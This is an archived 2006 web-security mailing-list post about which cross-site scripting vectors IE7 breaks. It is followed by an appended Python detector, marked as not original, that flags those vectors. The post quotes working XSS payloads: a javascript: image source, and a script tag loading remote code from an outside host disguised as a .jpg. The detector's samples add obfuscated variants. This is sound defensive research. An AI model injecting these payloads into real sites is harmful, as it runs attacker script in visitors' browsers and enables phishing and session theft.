[WEB SECURITY] RE: XSS-Phishing on Financial Sites (Tip of the iceberg)

RSnake rsnake at shocking.com
Mon Jun 26 00:48:32 EDT 2006


  	Sorry, I should have been more explicit.  I meant inside image
tags:

  	<IMG SRC="javascript:alert('XSS');">

  	To my knowledge that is the only vector in IE7.0 that is broken,
and when I asked the IE product folks about it (several of them) they
each came back with the same answer, that they didn't think anyone was
using it, so they weren't sure if it was okay to deprecate or not -
actually they also said that it should still work at one point, but I
think they changed their tune when they realized it was most often used
as an attack, rather than a feature.  I gave them one working real world
example of where it was used, but I never heard back - they also had a
change of product folks around that time so it might have gotten lost in
the shuffle.  If one of the Microsoft security people that subscribe
here would like to comment to the forum, that would be helpful.

  	Again, this will only close one vector and it's a vector that
already doesn't work in Firefox, so this isn't a major win against XSS
- it's a minor one at best.  But to answer your question <script
src="http://ha.ckers.org/xss.jpg"></script> will continue to work, from
what I can tell.  Of course, I'd recommend downloading the beta and
testing yourself (not on a machine you care about, because lots of
websites aren't forward compatible and don't understand that IE7.0 is a
valid browser).

-RSnake
http://ha.ckers.org/
http://ha.ckers.org/xss.html
http://ha.ckers.org/blog/feed/

On Sun, 25 Jun 2006, arian.evans wrote:

>> time being, there are no efforts I am aware of, other than IE
>> appears to be breaking the JavaScript directive inside of images
>
> Inside of images, or inside of image tags?
>
> I still haven't found content type restrictions, and commonly
> embed images that are really js/vbs that IE will still execute.
>
> Haven't tried this on the newest IE 7 build either...think you
> mentioned they were breaking this.
>
> http://www.anachronic.com/xss
>
> has a few silly sample files, nothing malicious, plan to put more
> up if we ever release our payload packages.

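A defender-side check for the two vectors quoted in this message, added here as an example and not part of the original post or of RSnake's own tools: it flags URL attributes whose normalized scheme is javascript: or vbscript: (the IMG SRC case) and script elements whose src path carries an image extension (the xss.jpg case, a content-type mismatch hint only). The sample markup and the example.invalid host are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Attributes that take a URL and so can carry a script scheme.
URL_ATTRS = {"src", "href", "background", "action", "lowsrc"}
IMAGE_EXTS = (".jpg", ".jpeg", ".gif", ".png", ".bmp")

def normalize_url(value: str) -> str:
    """Collapse an attribute value to the form a lenient parser acts on:
    drop ASCII control characters and whitespace (legacy browsers ignored
    them inside the scheme) and lowercase it. Character references are
    already decoded by HTMLParser before this is called."""
    return re.sub(r"[\x00-\x20\x7f]", "", value).lower()

class ScriptVectorFinder(HTMLParser):
    """Collects (kind, tag, raw value) for script-scheme URLs in URL
    attributes and for <script src> pointing at an image-named resource."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is None or name not in URL_ATTRS:
                continue
            norm = normalize_url(value)
            if norm.startswith(("javascript:", "vbscript:")):
                self.findings.append(("script-scheme", tag, value))
            elif tag == "script" and name == "src":
                if urlsplit(norm).path.endswith(IMAGE_EXTS):
                    self.findings.append(("script-from-image", tag, value))

def find_script_vectors(markup: str):
    parser = ScriptVectorFinder()
    parser.feed(markup)
    parser.close()
    return parser.findings

# Constructed sample document: the two vectors from the message plus
# benign tags that must not be flagged.
SAMPLE = """
<img src="/images/logo.png" alt="ok">
<IMG SRC="javascript:alert('XSS');">
<a href=" JaVaScRiPt:void(0)">link</a>
<img src="jav&#x0A;ascript:alert(1)">
<script src="http://example.invalid/xss.jpg"></script>
<script src="/static/app.js"></script>
"""

if __name__ == "__main__":
    for kind, tag, value in find_script_vectors(SAMPLE):
        print(f"{kind:18} <{tag}> {value!r}")
```
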
----------------------------------------------------------------------------
The Web Security Mailing List: 
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
